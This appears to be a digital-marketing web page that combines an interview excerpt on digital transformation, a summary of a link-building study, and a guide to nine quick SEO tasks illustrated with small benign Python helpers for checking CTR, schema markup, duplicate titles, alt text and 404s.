I think sometimes big tough decisions need to be made in many areas at the same time. That is definitely true for legacy systems.

For instance, brand and digital departments might be using different tools to manage their campaigns. That means you can never have a single view of the customer, which in turn means you can never be customer-friendly in your advertising.

Someone then needs to make the decision to go for one holistic approach. That will require short term investments of time and money but is a crucial decision in order to be ready for the future and not lose your business in the long run.

Those decisions typically require strong leadership and vision. Without that it is very easy to keep focusing on those things that deliver you short term business without making the efforts needed to keep your long term business.

Which companies do you see as great examples of businesses which have embraced digital? What are the common factors in their approaches?

There are many such examples. I think the key thing they all have in common is strong, visionary leaders.

If the people we work with get stuck in digital transformation, it is almost always because the way they are incentivised (their targets, bonuses and career opportunities) is driven too much by short-term business results.

Those are the companies that will one day get an extreme wake up call because a new competitor will come out of nowhere with a new business model using new digital technology in smart ways and winning customers at high speed.

Where does data fit into digital transformation?

Despite the fact that I think the focus has been too much on technology and data, data definitely is becoming more important. I think no one can deny that.

I always advocate the balance between data, mind and heart. Data to measure everything you can measure, mostly the proven successes so you can optimise them further.

Mind is needed to look ahead into the future, assess how your business may be affected by new developments and craft the right experiments to be ready for that future.

Data isn’t very good at helping you with that because data is always based on the past. Even when models make predictions they are always based on past data. The heart is needed to recognise the moments when someone comes up with a great creative idea of something cool you can do with new technology.

In those moments you shouldn’t ask how much money you will earn from it. If the idea is fundamentally different from anything you have tried, you can’t know. If, however, your heart starts pounding, that probably means it is a great idea worth exploring. You can bring the measurement in afterwards, but don’t kill the idea upfront for lack of good data.

Joris will be taking part in a Google Squared webinar tomorrow, looking at the five fundamental limitations of data that create challenges in digital transformation. You can sign up for the webinar here.

Which kinds of links are most valuable for high rankings?


What does link-building look like right now? What tactics work? Is it all about quality content or do more shady tactics still get results?

Glen Allsop of ViperChill posted another excellent article recently, distilling the findings from his own manual analysis of 1,000 search results.

He looks at the link structure of various sites, trying to ascertain the kinds of links that help some sites rank, the tactics (white hat and not-so white hat) used by sites to rank, and the effects of factors like number of links and word count.

It’s a monster of a post – more than 5,000 words I’d guess – but truly worth a read. All I’ll do here is list some of the key lessons from Glen’s analysis.

The most common backlinks are natural

Glen found that natural (i.e. earned) backlinks top the chart, which is as it should be.

However, the study also found that many high ranking websites have some very low quality backlinks. They are things like forum pages, blog comments, and non-English Blogspot blogs. They’re not earned, but can be easily created.

Indeed, a recent look at Skyscanner’s impressive search rankings revealed something similar. There are quality links there, but plenty which could be classed as ‘low-quality’. Perhaps these are the result of older link building efforts, who knows?

Link volume does not influence ranking

It’s about quality not quantity. As this chart shows, the volume of backlinks does not correlate with ranking.

Variety of linking domains helps

Obvious perhaps, but good to reinforce. A variety of links from different domains matters much more than volume.


Longer content and high rankings

There have been a few studies suggesting a correlation between longer form content and higher search rankings.

It makes sense, as in theory, longer content can be more likely to satisfy the user (it’s detailed, covers key questions etc), and in turn more likely to attract links.

Glen’s data backs this point up. The average word count on all results was 1,762, and higher counts tended to correlate with higher rankings.


Link building tactics that still work

A few weeks ago, we talked about another finding around sitewide footer links used by some sites, and how tactics like this help the ‘rich get richer’ in search (this was another finding from ViperChill).

In this article, Glen looks at how Houzz uses a widget to embed dozens of hard-coded links in the websites of those who host it. It seems this tactic is still in use.

Good content still works

Writing quality content to attract links is still an excellent tactic. Evergreen content is key to this.

The example used here is a beginner’s guide to the Paleo diet, from the nerdfitness blog. It has attracted links from 800 domains and continues to deliver traffic to this day.

paleo diet

Why does it still attract links? Four reasons:

  • High ranking. It’s up there right now, so when people look for resources to link to, there it is.
  • It’s a good article. It’s there because it serves a need. It’s also comprehensive which means people don’t need to look elsewhere.
  • Internal links. The sidebar on the homepage links to the post so it continues to accrue traffic.
  • Loyal audience. The site has an engaged audience who appreciate and link to the content.

Dodgy tactics can still work

There are still plenty of dubious tactics that are helping websites achieve high rankings.

For example, this .info site has 195,000 links from 242 domains; that’s more than 800 per domain. I’m ‘sure’ they’re all earned, natural links though…


The study found fewer private blog networks than expected, but also that they still work.

In summary

I’ve only scratched the surface of the study here, so please check out the full article for much more. It is itself a great example of creating quality (and long-form) content that attracts links. I’m sure we won’t be the only site linking to it.

Nine SEO techniques that take less than 15 minutes

Search Console Search Analytics

I know. It’s the 21st century equivalent of ‘8 minute abs’. But bear with me on this…

Search engine optimisation should be an ongoing process, mixing technical on-page techniques with quality content, good old fashioned marketing, plenty of research, tonnes of planning, masses of testing and all the while taking into account searcher intent, context, algorithm changes… I get breathless just thinking about all the work that needs doing…

Basically, SEO is a job that is never done.

But, if you are struggling with time and resources, there are SEO techniques that don’t have to consume your entire day.

The following can be done while sat down in the morning, enjoying a pastry, listening to some cool light-jazz and blissfully remembering that this is a much better use of your time than that other ‘resolution’ you toyed with doing four paragraphs ago.

Please note: we published a similarly titled guide to quick SEO tips, written by Josh McCoy, way back in 2012. This is an updated, rewritten version that reflects the subsequent changes and updates to the search landscape.

1. Check your site’s organic CTR, then revise the title tags and meta descriptions of 10 of the lowest-performing pages

Head into your site’s Google Search Console, then click on Search Traffic>Search Analytics.

Then click on the Impressions and CTR filters for Pages.

Here you can take a look at the pages with high visibility, but low CTR. Perhaps all they need is an improved meta description or title tag?
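If you export that report, the sifting can be scripted. A minimal sketch, assuming a simple (page, impressions, clicks) row format rather than the actual Search Console export or API:

```python
def low_ctr_pages(rows, min_impressions=1000, n=10):
    """From (page, impressions, clicks) rows, return the n pages with the
    lowest CTR among those that already get meaningful visibility."""
    candidates = [(clicks / impressions, page)
                  for page, impressions, clicks in rows
                  if impressions >= min_impressions]
    return [page for _, page in sorted(candidates)[:n]]

rows = [("/a", 5000, 400), ("/b", 8000, 80), ("/c", 200, 50)]
print(low_ctr_pages(rows, n=1))  # ['/b']
```

The `min_impressions` cut-off keeps barely seen pages from drowning out the ones where a better title tag would actually move the needle.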

For a more detailed overview, check out How to improve CTR using Search Console.

2. Add Schema markup to your 10 most popular pages

You can add rich media to your search results by adding Schema markup to the HTML of your pages.


If you have a particularly massive site with years and years worth of posts, the idea of adding rich snippets to your pages can seem terrifying. Instead, make a spreadsheet of your most popular posts, then every day go through 10 of them and implement schema markup. This should help gradually improve the CTR of your results.
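As an illustration (not a complete schema.org implementation; the field names shown are a minimal subset and the sample values are made up), a small helper can stamp out basic Article markup for each page on that spreadsheet:

```python
import json

def article_jsonld(headline, author, date_published, url):
    """Render a minimal schema.org Article object as a JSON-LD script tag."""
    data = {
        "@context": "https://schema.org",
        "@type": "Article",
        "headline": headline,
        "author": {"@type": "Person", "name": author},
        "datePublished": date_published,
        "mainEntityOfPage": url,
    }
    return '<script type="application/ld+json">%s</script>' % json.dumps(data)

tag = article_jsonld("My film review", "A. Critic",
                     "2016-05-06", "https://example.com/review")
```

The resulting tag goes in the page's HTML; Google's Structured Data Testing Tool will confirm whether it parses.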

3. Improve your site speed by optimising images

Site speed is a hugely important ranking signal, and you can check your site’s loading time on both mobile and desktop with this new site speed tool.

Obviously improving the performance of your site is a complicated job best saved for the tech team, but you can help…

Images are by far the ‘heaviest’ element when it comes to page load. So why not spend a few minutes working back through your most popular posts and making your image file sizes smaller?

For example, if there’s an image on your page that’s 1024 x 683 pixels, but the user only sees it at a maximum of 420 x 289, you could ease the strain on your page by compressing the file size with very little noticeable difference.
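A quick back-of-the-envelope calculation shows why this matters. Pixel count is only a rough proxy for file size, but using the dimensions from the example above:

```python
def pixel_savings(orig_w, orig_h, display_w, display_h):
    """Fraction of pixels (a rough proxy for file size) saved by
    resizing an image down to its largest displayed dimensions."""
    orig = orig_w * orig_h
    resized = display_w * display_h
    return 1 - resized / orig

# Served at 1024x683 but only ever displayed at 420x289:
print(round(pixel_savings(1024, 683, 420, 289), 2))  # 0.83
```

Roughly 83% of the pixels being shipped are never seen, which is a lot of wasted bandwidth on every page view.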

Read this article for full details: How to optimise your page images to increase site speed.

4. Check the proper canonicalization of your domain

Are you aware that your site may exist in two different places, with and without the www prefix? Without even knowing it, Google could be indexing your content from both, and therefore you may be cannibalising your own pages in search.

Luckily it doesn’t take very long to fix this problem.

You just have to tell Google which is the preferred version of your domain for all future crawls of your site and indexing refreshes.

As it states on their webmaster help page:

If you specify your preferred domain as http://www.example.com and we find a link to your site that is formatted as http://example.com, we follow that link as http://www.example.com instead. In addition, we’ll take your preference into account when displaying the URLs.

To change this, visit Search Console, click on your site, click the gear icon then click Site Settings. And in the Preferred domain section, select the option you want.
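The effect of the setting can be sketched in a few lines; example.com and the preference for the www host are purely illustrative:

```python
from urllib.parse import urlsplit, urlunsplit

PREFERRED = "www.example.com"                      # the domain chosen in Site Settings
ALIASES = {"example.com", "www.example.com"}       # all hosts the site answers on

def canonical(url):
    """Rewrite any alias of the site onto the preferred host, mirroring
    how Google treats links once a preferred domain is set."""
    parts = urlsplit(url)
    if parts.netloc in ALIASES:
        parts = parts._replace(netloc=PREFERRED)
    return urlunsplit(parts)

print(canonical("http://example.com/page"))  # http://www.example.com/page
```

URLs on other hosts pass through untouched, so the same helper is safe to run over a full list of backlinks.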

5. Verify your Google My Business page, make sure your details are up to date

Kevin Gibbons wrote some good suggestions for us when it comes to optimising your page for local search:

  • Claim your listing, as many people often don’t.
  • Ensure your details are up to date (previously you might not have accepted credit cards, for example).
  • Double-check your opening hours and phone number, as these often change over time or when the business gets new owners or management.
  • Check the business images you are using and consider refreshing them or uploading higher-res versions.
  • Check that no one has made an edit to your listing and changed the business’s website to their affiliate link. I have seen this too!

There are loads more tips here: How to optimise your Google My Business listing.

6. Check that you don’t have any duplicate meta description and title tags

This is a very easy one. Just head back into Search Console, click on Search Appearance>HTML Improvements, then you can see exactly which of your pages contain duplicate metadata.

Search Console HTML Improvements
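The same check can be run offline against a crawl of your own pages. A minimal sketch, assuming a simple (url, title) row format pulled from your crawler of choice:

```python
from collections import defaultdict

def duplicate_titles(pages):
    """Group URLs by title tag and keep only titles that appear on
    more than one page (whitespace and case differences ignored)."""
    by_title = defaultdict(list)
    for url, title in pages:
        by_title[title.strip().lower()].append(url)
    return {t: urls for t, urls in by_title.items() if len(urls) > 1}

pages = [("/a", "Home"), ("/b", "Home "), ("/c", "Contact")]
print(duplicate_titles(pages))  # {'home': ['/a', '/b']}
```

The same function works for meta descriptions; just feed it (url, description) pairs instead.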

7. Keep on top of your image alt tags

Google Image Search can drive a significant amount of traffic to your site. However, you must remember that Google can’t ‘see’ your images, but it can ‘read’ them via their alt text.

Therefore, describing your images accurately and concisely in the alt attribute is something you really need to stay on top of.

Check back through your last handful of pages and make sure your images conform.
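That pass over your recent pages can be automated. A sketch using only the standard library (the sample HTML is made up) that flags images with empty or missing alt text:

```python
from html.parser import HTMLParser

class AltAudit(HTMLParser):
    """Collects the src of every <img> that lacks descriptive alt text."""
    def __init__(self):
        super().__init__()
        self.missing = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            attrs = dict(attrs)
            if not (attrs.get("alt") or "").strip():
                self.missing.append(attrs.get("src", "?"))

page = '<img src="a.jpg" alt="Red bike"><img src="b.jpg" alt=""><img src="c.jpg">'
audit = AltAudit()
audit.feed(page)
print(audit.missing)  # ['b.jpg', 'c.jpg']
```

Point it at each page's HTML and you get a to-do list of images to describe, which pairs nicely with the file-size check in point 3.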


You could even look at the alt tags at the same time as checking your images’ file sizes (see point 3).

For lots more information, check out How to optimise images for SEO.

8. Check your 404 error codes

404 errors occur when Googlebot attempts to visit a page that doesn’t exist. Generally, 404s are fine and won’t harm your rankings, but it is important to pay attention to them, especially if there’s a sudden increase.

You can check these in Search Console, under Crawl>Crawl Errors.

Then if anything looks to have been deleted accidentally, or a 301 redirect hasn’t been put in place properly, you can fix these straight away.
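Triaging that export can also be scripted. The (url, status) pair format and the redirect map below are assumptions for illustration, not the Search Console export format:

```python
def needs_attention(crawl_errors, redirects):
    """Given (url, status) pairs from a crawl-error report and a dict of
    301 redirects already in place, return URLs still serving 404s."""
    return [url for url, status in crawl_errors
            if status == 404 and url not in redirects]

errors = [("/old-page", 404), ("/fine-page", 200), ("/moved", 404)]
redirects = {"/moved": "/new-home"}
print(needs_attention(errors, redirects))  # ['/old-page']
```

Anything the function returns either needs restoring or needs a 301 adding; anything already in the redirect map just needs the redirect verified.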

9. Keep on top of your internal linking

Regular and consistent internal linking to the most popular articles on your site is a key way to show search engines that your site has authority and that your content is ‘trusted’.

There are many different methods and tools for checking which of your pages rank best for any given search phrase, and therefore which ones you should be linking to internally for added SEO benefit.

Spend some time going back through your posts and ensuring that each post has a few internal links, paying particular attention to the anchor text used, and making sure they’re all relevant AND pointing towards pages you wish to see rank.

There’s an excellent, detailed best practice guide here: Internal linking for SEO.

So there you go. Nine quick things you can do to improve your SEO every day without taking up too much of your energy. Obviously this is far from an exhaustive list, but it’s definitely a start to getting the basics right.